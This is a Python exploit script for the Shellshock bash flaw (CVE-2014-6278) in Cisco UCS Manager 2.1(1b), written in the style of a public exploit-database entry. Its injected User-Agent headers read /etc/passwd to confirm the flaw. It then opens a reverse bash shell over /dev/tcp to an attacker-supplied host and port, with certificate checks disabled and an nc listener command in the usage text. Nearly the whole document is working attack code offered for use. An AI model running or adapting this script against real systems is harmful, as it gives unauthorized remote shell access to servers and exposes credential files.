Cisco UCS Manager 2.1(1b) Shellshock

`#!/usr/bin/python  
###############################################  
# Cisco UCS Manager 2.1(1b) Shellshock Exploit  
#   
# CVE-2014-6278  
# Confirmed on version 2.1(1b), but more are likely vulnerable.  
# Cisco's advisory:   
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash  
# Exploit generates a reverse shell to a nc listener.  
# Exploit Author: @thatchriseckert  
###############################################  
  
import sys  
import requests  
import time  
  
if len(sys.argv) < 4:  
print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"  
print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"  
print "[*]"  
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"  
print "[*] Listener: nc -lvp <port>"  
print "\n"  
sys.exit()  
  
#Disables request warning for cert validation ignore.  
requests.packages.urllib3.disable_warnings()   
ucs = sys.argv[1]  
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"  
attackhost = sys.argv[2]  
revshellport = sys.argv[3]  
headers1 = {  
'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'  
}  
headers2 = {  
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'  
}  
  
def exploit():  
try:  
r = requests.get(url, headers=headers1, verify=False, timeout=5)  
except Exception, e:  
if 'timeout' in str(e):  
print "[+] Success. Enjoy your shell..."  
else:  
print "[-] Something is wrong..."  
print "[-] Error: " + str(e)  
  
def main():  
try:  
r = requests.get(url, headers=headers2, verify=False, timeout=3)  
if r.content.startswith('\nroot:'):  
print "[+] Host is vulnerable, spawning shell..."  
time.sleep(3)  
exploit()  
else:  
print "[-] Host is not vulnerable, quitting..."  
sys.exit()  
except Exception, e:  
print "[-] Something is wrong..."  
print "[-] Error: " + str(e)  
  
if __name__ == "__main__":  
main()  
  
`